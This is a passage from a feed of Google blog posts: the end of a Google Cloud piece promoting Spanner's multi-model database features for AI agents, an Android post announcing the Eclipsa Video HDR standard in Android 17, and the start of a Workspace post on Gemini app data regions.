&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This technical momentum, which also recently earned Spanner the prestigious &lt;/span&gt;&lt;a href="https://sigmod.org/2025-sigmod-systems-award/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;SIGMOD Systems Award&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;is matched by undeniable economic value. A recent Forrester Consulting Total Economic Impact™ (TEI) study commissioned by Google Cloud found that an organization (based on composite customer profile from Forrester’s survey) realized a &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/forrester-tei-study-on-spanner-shows-benefits-and-cost-savings?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;132% ROI with a fast 9-month payback period&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, yielding &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;$7.74M in total benefits&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; over three years having deployed Spanner.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The multi-model advantage for the agentic era&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;True AI autonomy requires deep context. To reason effectively, an AI agent cannot look at data through a single lens; it must simultaneously understand structured history (relational), semantic meaning (vectors), real-world connections (graphs), and textual details (full-text search).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner natively breaks down these multi-model barriers. Instead of forcing you to stitch together disparate engines, Spanner unifies relational, vector, graph, key-value, and full-text search data directly within a single, highly performant database architecture. This architectural integration allows AI models to leverage situational, semantic, and relationship context instantly and concurrently.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner’s fully interoperable multi-model capabilities allow organizations to build intelligent applications without compromise:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/databases/announcing-spanner-graph?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner Graph&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: A unified graph and relational experience built on the ISO-standard &lt;/span&gt;&lt;a href="https://graphql.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. You can model data natively as a graph or as an overlay on top of relational data, which is critical for building knowledge graphs that ground AI agents in real-world facts. Customers like &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/customers-see-real-world-success-with-multi-model-spanner?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Palo Alto Networks&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; leverage Spanner Graph to power crucial access-control use cases at planet-scale, securing their AI infrastructure without needing a specialized, siloed graph database.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/databases/how-spanner-vector-search-supports-generative-ai-apps?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Integrated vector search&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: A fully integrated semantic search solution offering both K-Nearest Neighbors (KNN) and Approximate Nearest Neighbor (ANN) search, capable of supporting indexes with over 10 billion vectors for fast, low-latency retrieval-augmented generation (RAG).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Relational and &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/non-relational/overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;key-value&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Spanner pioneered the relational scale-out database (Google SQL and PostgreSQL). We've also introduced high-performance key-value capabilities via a Cassandra-native endpoint, allowing for easy lift-and-shift of Cassandra workloads.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/full-text-search"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Full-text search&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Building on Google's decades of search expertise, Spanner provides advanced information retrieval across structured and unstructured data, including an &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;enhance_query&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; option for automatic synonym matching and spell correction. Streaming legal intelligence &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;platform &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/customers-see-real-world-success-with-multi-model-spanner?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Inspira&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; simplified a 4.5 TB data pipeline into a unified, high-performance single-source of truth. Leveraging Spanner’s native support for FTS  and vector search capabilities Inspira achieved high-precision snippets for LLM-based legal analysis with RAG workflow.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/columnar-engine"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner columnar engine&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This architectural breakthrough enables analytical queries to run up to 200× faster on live operational data, bridging the gap between OLTP and analytics to provide agents with real-time context without the "ETL tax." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AI-powered fraud prevention platform &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/customers-see-real-world-success-with-multi-model-spanner?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Verisoul&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; uses the columnar engine to run rich analytics on high-velocity transactional writes in one place, eliminating data copies and replication lag to get near-instant answers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;True interoperability means these aren't just isolated features ,  they are tightly integrated. Instead of writing complex application logic and brittle ETL pipelines to stitch together a graph database, a vector database, and a search engine, developers can query relationships, semantic meaning, and keywords in a single, ACID-compliant SQL statement.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s an example of how a developer can combine relational, graph traversal, full-text search, and vector similarity search in one cohesive query to power an intelligent product recommendation agent:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_XCfyf3z.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Spanner Omni: Multi-model capabilities, everywhere&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To truly be the unified data foundation for the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/whats-new-in-the-agentic-data-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a database cannot be confined by infrastructure borders. That’s why we expanded our vision with Spanner Omni, bringing these multi-model capabilities to any environment without hardware restrictions, just as we did with AlloyDB Omni. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner Omni is a downloadable version of Spanner in a fully containerized deployment model that requires absolutely zero dedicated hardware. It is designed with maximum flexibility in mind, running natively on Kubernetes using the infrastructure you already own. Whether your workloads are running on-prem, at the edge, or across other major public clouds like AWS and Azure, Spanner Omni gives you control and helps ensure you have a consistent, globally distributed data foundation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;This means organizations can leverage Spanner Graph, vector search, full text search, and our columnar engine anywhere, effectively breaking down cloud silos and making these cutting-edge capabilities available without vendor lock-in.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Industry-defining capabilities for core databases&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the 2025 Gartner® Critical Capabilities for Cloud Database Management Systems for Operational Use Cases, for the second consecutive year, Gartner ranked Google (Spanner) #1 in the Lightweight Transactions Use Case. This a testament to its efficiency and low latency for modern, event-driven microservices.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In our opinion, this industry recognition goes far beyond simple market presence, it is validated by deep foundational technical breakthroughs that separate Spanner from legacy architectures. Unlike platforms that bolt disparate, siloed database engines together and label it as "multi-model," or require users to select the modality at the time of database creation with no interoperability between modalities, Spanner’s capabilities are built on a bedrock of Google’s most advanced computer science:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/true-time-external-consistency"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;TrueTime and Paxos for global consistency&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Spanner’s distributed transactions are governed by TrueTime — a highly available, globally synchronized clock system utilizing GPS and atomic clocks. This enables lock-free distributed reads and strict external consistency globally. Combined with highly optimized Paxos consensus, Spanner delivers synchronous replication with zero data loss (Recovery Point Objective, i.e. RPO=0) and rapid recovery timelines (Recovery Time Objective, i.e. RTO=0) even during total regional failures.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/columnar-engine"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Integrated columnar engine&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: To eliminate the ETL tax and bridge the gap between OLTP and OLAP, we integrated a breakthrough columnar engine directly into Spanner's distributed storage layer (Colossus). This allows developers to run complex analytical queries to run up to 200x faster directly on live, operational data without impacting transactional performance. And with full separation of storage and compute, users are able to run large analytical queries without impacting the operational workload using &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/databoost/databoost-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner DataBoost&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a serverless technology that directly accesses the database storage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/databases/how-spanner-vector-search-supports-generative-ai-apps?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;ScaNN-powered vector search&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Our native vector search isn't a bolted-on afterthought. It’s powered by Scalable Nearest Neighbors (ScaNN) — the exact same state-of-the-art indexing algorithm that powers Google Search and YouTube. This allows Spanner to execute sub-millisecond similarity searches across 10-billion-plus vector indexes natively alongside relational and graph data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Dynamic resharding&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Under the hood, Spanner's architecture automatically reshards data based on size and load. This transparent load balancing eliminates the dreaded "hotspotting" that plagues legacy NoSQL and distributed SQL systems.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While some industry evaluations often measure the market through a fragmented lens of disconnected database engines, we believe true innovation requires engineering for this level of deep, architectural integrations. For the agentic era, anything other than a natively unified foundation is simply a bottleneck.  &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;A unified vision for the agentic era&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We believe that the future of data is unified, open, and inseparable from AI. Spanner’s momentum reflects a market rapidly shifting away from a patchwork of isolated databases towards a  singular, intelligent context hub. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To meet this future head-on, we are relentlessly expanding what is possible with a single unified database. This includes breakthrough innovations like our integrated columnar engine for real-time analytics, native vector search powered by Google's world-class ScaNN technology, and built-in AI functions that bring model inference directly to your data. Furthermore, by integrating Spanner Graph integrated with Graph Neural Networks (GNNs) for deep predictive reasoning, and Spanner Omni to extend this  unified architecture across hybrid and multi-cloud environments, we are delivering a platform designed for what comes next.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, Spanner does not exist in isolation; it is a foundational pillar of Google’s broader &lt;/span&gt;&lt;a href="https://cloud.google.com/data-cloud?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Through seamless, zero-ETL integrations across our Data Cloud Including BigQuery for enterprise-wide analytics and Gemini Enterprise Agent Platform for advanced model orchestration, Spanner breaks down the barriers between operational data and enterprise intelligence. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the agentic era, AI models require more than just isolated data points; they need a cohesive ecosystem. By natively federating real-time operational context from Spanner with petabyte-scale historical insights from BigQuery, we empower agents to act autonomously, reason deeply, and drive unprecedented business value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By providing a real-time, trustworthy, and multi-faceted view of data, regardless of where it lives, Spanner empowers organizations to build the next wave of transformative, intelligent applications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are incredibly excited about the journey ahead and will continue to pioneer the frontiers of what a true multi-model database can achieve.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Try Spanner for free for 90-days or for as little as $65 USD/month for a production-ready instance that grows with your business without downtime or disruptive re-architecture.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Critical Capabilities for Cloud Database Management Systems for Operational Use Cases, By Ramke Ramakrishnan, Masud Miraz, Xingyu Gu, Henry Cook, Aaron Rosenbaum, November 19, 2025.&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt;
&lt;p&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;GARTNER and MAGIC QUADRANT are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt;
&lt;p&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/the-power-of-multi-model-spanner-for-the-agentic-era" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-29T23:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/eclipsa-video-hdr-review.html</id>
    <title>Eclipsa Video: HDR That Looks Right on Every Screen</title>
    <updated>2026-06-29T20:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGg9E8BsBcgigJ3Pwhp0Wbd85wffhQKw9jT9eW4_IJHtJsxtaqBqZoWIc4agLIZu9h2eWFEnMgipcv2PnMM2UC9tsZOJp3AMjsOX1KQRoisg5IKTRS20hFOIvJmlViYFz-QOh3-KdyFRIgUaiKs2ehjrJBd9W_yW13aP4xgRQovNCEAviajCLWFTTVrjs/s2469/Eclipsa%20Video%20V01%20White_Meta.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Tibian Elsheikh, Product Manager, Android Core Graphics and Jeffrey Jose, Product Manager, Android Core Graphics&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0slfG8CUVGmPiAUHIXkeIVZGveJMOvf1TorUdONiRYV1THM80OzIIjGV5-bOboEhNz7FB4sTYx72ySEjFhQ4oW97-sLZ4scOX2Sb5BBU9qPMvOXvq2XRj098K7ElBnvy4k68jKELpDZ7vd4NIs2Hud2w14re18dOx7dksdFXRBR_Nd8yOiBrw8cLr_kM/s8583/Eclipsa%20Video%20V02_Blog.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0slfG8CUVGmPiAUHIXkeIVZGveJMOvf1TorUdONiRYV1THM80OzIIjGV5-bOboEhNz7FB4sTYx72ySEjFhQ4oW97-sLZ4scOX2Sb5BBU9qPMvOXvq2XRj098K7ElBnvy4k68jKELpDZ7vd4NIs2Hud2w14re18dOx7dksdFXRBR_Nd8yOiBrw8cLr_kM/s1600/Eclipsa%20Video%20V02_Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;We’ve all been there: You’re scrolling through your favorite social media feed in a dim room, and suddenly an HDR video pops up. It’s so intensely bright that you have to squint, or maybe you find yourself turning down your screen brightness just to read the caption. Other times, a video that looks vibrant on your phone looks flat, dark, or washed out when you watch it on your living room TV.&amp;nbsp;&lt;/p&gt;&lt;p&gt;While High Dynamic Range (HDR) technology was designed to make videos look richer and more lifelike, the lack of unified industry guidelines means that the exact same clip can render in unexpected and jarring ways depending on the display you’re using.&lt;/p&gt;

&lt;p&gt;To solve this, we’re introducing Eclipsa Video—a new standard built to make your favorite videos look consistent, balanced, and comfortable on every screen. Eclipsa Video builds on the open &lt;a href="https://github.com/SMPTE/st2094-50"&gt;SMPTE ST 2094-50 specification&lt;/a&gt;, which Google developed in collaboration with Apple and NBCUniversal.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;i&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLDY0gLjHQYTZZfRzikfPu8P3jZkXhq6Wqo1GFj3CvBh9YaboIDUstPcnV94Qan8nVkXXBlXLm5vSktLM_q9DJIIn_jyeW9LyZchI5Fpm6AD7A5XD3ZRslzBFhJLAvRj589ukW0etBNCg7004SjySw_SYsGkg6dQ8AtgfofOZeFTx8R3H7xWfwAuA-Rqc/s1066/Eclipsa_9-16_Transparent%20(2).gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLDY0gLjHQYTZZfRzikfPu8P3jZkXhq6Wqo1GFj3CvBh9YaboIDUstPcnV94Qan8nVkXXBlXLm5vSktLM_q9DJIIn_jyeW9LyZchI5Fpm6AD7A5XD3ZRslzBFhJLAvRj589ukW0etBNCg7004SjySw_SYsGkg6dQ8AtgfofOZeFTx8R3H7xWfwAuA-Rqc/w225-h400/Eclipsa_9-16_Transparent%20(2).gif" width="225" /&gt;&lt;/a&gt;&lt;/div&gt;Sudden brightness spikes during feed scrolling—fixed with Eclipsa Video.&lt;/i&gt;&lt;/div&gt;&lt;/i&gt;&lt;p&gt;&lt;/p&gt;

&lt;h3 style="color: #333333; text-align: left;"&gt;&lt;strong&gt;&lt;span style="font-family: inherit; font-size: large;"&gt;More consistency, comfort, and creative control&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;Eclipsa Video moves past individual display guesswork. Instead of leaving it up to your device to interpret a video’s brightness on its own, our format carries precise guidelines that tell compatible displays exactly how to render the image. &lt;br /&gt;&lt;p&gt;Designed to scale with your hardware, Eclipsa Video provides three core benefits:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;A consistent baseline:&lt;/strong&gt; Eclipsa Video introduces a shared rulebook for screens. It establishes a consistent benchmark for normal brightness—known as the &lt;b&gt;HDR reference white&lt;/b&gt;. This ensures standard text, app interfaces, and standard-range colors remain vibrant and readable without causing uncomfortable screen glare.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Adaptive headroom:&lt;/strong&gt; Screens have different physical brightness limits, or "headroom." Eclipsa Video guides how displays handle highlights dynamically. Bright details remain brilliant on a premium television, while being scaled intelligently on a mobile screen to prevent sudden blinding transitions.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Preserved creative intent:&lt;/strong&gt; Rather than applying a single static setting to an entire video, Eclipsa Video carries adaptive, frame-by-frame instructions. Think of it as a set of digital notes from the creator traveling with the video, ensuring the exact colors, contrast, and mood they graded are preserved on your display.&lt;/li&gt;&lt;/ul&gt;

&lt;div class="separator" style="clear: both;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirgS5TsogRUxWbypUiFlWIRuL8nQhdagvc7UHVFjoDG00SjqSrMniKFEys-EzgcrHKi6Am5BrtALEs7px1oaaJ5ciaO7hP0_49i8RuD7uCckjW7jYWrSoFkDlob6dJhL42MPLiBQqAjaPMOMJDEjZjDgvVe0P28fw13RlMNSiMEAlx5XFXCr8o6L8SRo0/s1600/Eclpsa%20Blog%20post%20image-AlphaB.png" /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Eclipsa Video preserves true highlight detail on any screen you watch.&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="color: #333333; text-align: left;"&gt;&lt;strong&gt;&lt;span style="font-family: inherit; font-size: large;"&gt;Built natively into Android 17&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;

&lt;p&gt;Starting with Android 17, support for Eclipsa Video is built directly into the platform. This means a more comfortable, true-to-life HDR experience is coming natively to the phones, tablets, and TVs you rely on every day. The video you capture carries its creative intent with it, and the video you watch is shown exactly the way it was meant to be seen.&lt;/p&gt;

&lt;h3 style="color: #333333; text-align: left;"&gt;&lt;strong&gt;&lt;span style="font-family: inherit; font-size: large;"&gt;Guidelines for developers &amp;amp; creators&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;

&lt;p&gt;We’re inviting the developer and creator ecosystem to help build a more reliable HDR environment:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;Get started with implementation:&lt;/strong&gt; Learn how to configure playback and capture in your apps with our &lt;a href="https://developer.android.com/media/platform/integrate-eclipsa-video"&gt;official guide&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;ExoPlayer &amp;amp; Media3 integration:&lt;/strong&gt; Standard playback handling built directly into &lt;a href="https://developer.android.com/media/media3/exoplayer"&gt;Jetpack Media3,&lt;/a&gt; allowing ExoPlayer to support Eclipsa Video metadata automatically with no additional player configuration.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Explore open source tools:&lt;/strong&gt; View and inspect &lt;a href="https://github.com/SMPTE/st2094-50"&gt;SMPTE ST 2094-50&lt;/a&gt; metadata and dynamic gain curves in real time using the &lt;a href="https://webmproject.github.io/hdr-explorer/"&gt;HDR Explorer&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 style="color: #333333; text-align: left;"&gt;&lt;strong&gt;&lt;span style="font-family: inherit; font-size: large;"&gt;What’s next&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;

&lt;p&gt;Eclipsa Video is rolling out now, and you’ll see more apps and devices supporting it over time. Because it’s an open standard, any app developer or hardware manufacturer can integrate it to elevate the viewing experience.&lt;/p&gt;

&lt;p&gt;Try out the new tools in Android 17, explore the open-source metadata, and let us know what you think on our developer channels. We can’t wait to see what you create.&lt;/p&gt;

&lt;h3 style="color: #333333; text-align: left;"&gt;&lt;strong&gt;&lt;span style="font-family: inherit; font-size: large;"&gt;Notes &amp;amp; Availability&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p style="text-align: left;"&gt;&lt;strong&gt;1. Device Compatibility:&lt;/strong&gt; Eclipsa Video playback and capture are supported natively on devices running Android 17 (API level 37) and above with HDR displays passing Eclipsa Compliance tests.&lt;/p&gt;
&lt;p style="text-align: left;"&gt;&lt;strong&gt;2. Developer Resources:&lt;/strong&gt; The &lt;a href="https://github.com/SMPTE/st2094-50"&gt;SMPTE ST 2094-50 Specification&lt;/a&gt; is openly accessible for technical evaluation.&lt;/p&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/06/eclipsa-video-hdr-review.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-06-29T20:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/gemini-app-data-regions-support.html</id>
    <title>Data regions support for the Gemini app now available</title>
    <updated>2026-06-29T19:58:12+00:00</updated>
    <content type="html">Beginning today, the Gemini app adheres to your organization’s data regionalization requirements. As with Google Workspace, admins have the flexibility to configure controls for EU storage and processing, US storage and processing, or both, including granular settings down to the organizational unit (OU) level.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI7BAja-5-rKJfB7Mz-7PKh-_OFEKnTRl0Kxo41HEUbMV9ebrqT_poUZcPETp9EJY3ELoKB54s7PiOiVhqa-SbohW1szV9zz0F_hOXPmC8PE1E7UmbFpAHPglIN1oQeqtOR2LgXGYMifA6tWqPil2sRiFhryOXxh1YYVdE_K3k8_k1FCgak6SCSAxI7tI/s1095/Data%20regions%20support%20for%20the%20Gemini%20app%20now%20available%20-%206406.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI7BAja-5-rKJfB7Mz-7PKh-_OFEKnTRl0Kxo41HEUbMV9ebrqT_poUZcPETp9EJY3ELoKB54s7PiOiVhqa-SbohW1szV9zz0F_hOXPmC8PE1E7UmbFpAHPglIN1oQeqtOR2LgXGYMifA6tWqPil2sRiFhryOXxh1YYVdE_K3k8_k1FCgak6SCSAxI7tI/s16000/Data%20regions%20support%20for%20the%20Gemini%20app%20now%20available%20-%206406.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Data regions are critical for ensuring many customers can meet their own internal requirements, as well as other legal, regulatory, and data sovereignty requirements by controlling the geographical location of their data at rest. Expanding these controls to the Gemini app allows our customers to adopt Gemini broadly in their organization with confidence that their data is being processed and stored in the location they require.&amp;nbsp;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Visit the Help Center to learn more about &lt;a href="https://support.google.com/a/answer/14316863" target="_blank"&gt;data regions&lt;/a&gt;, &lt;a href="https://support.google.com/a/answer/14310028" target="_blank"&gt;choosing a geographic location for your data&lt;/a&gt;, &lt;a href="https://support.google.com/a/answer/14310030" target="_blank"&gt;setting up advanced settings for data regions&lt;/a&gt;, and &lt;a href="https://support.google.com/a?p=data-covered-region-policy" target="_blank"&gt;what data is covered by data regions&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled 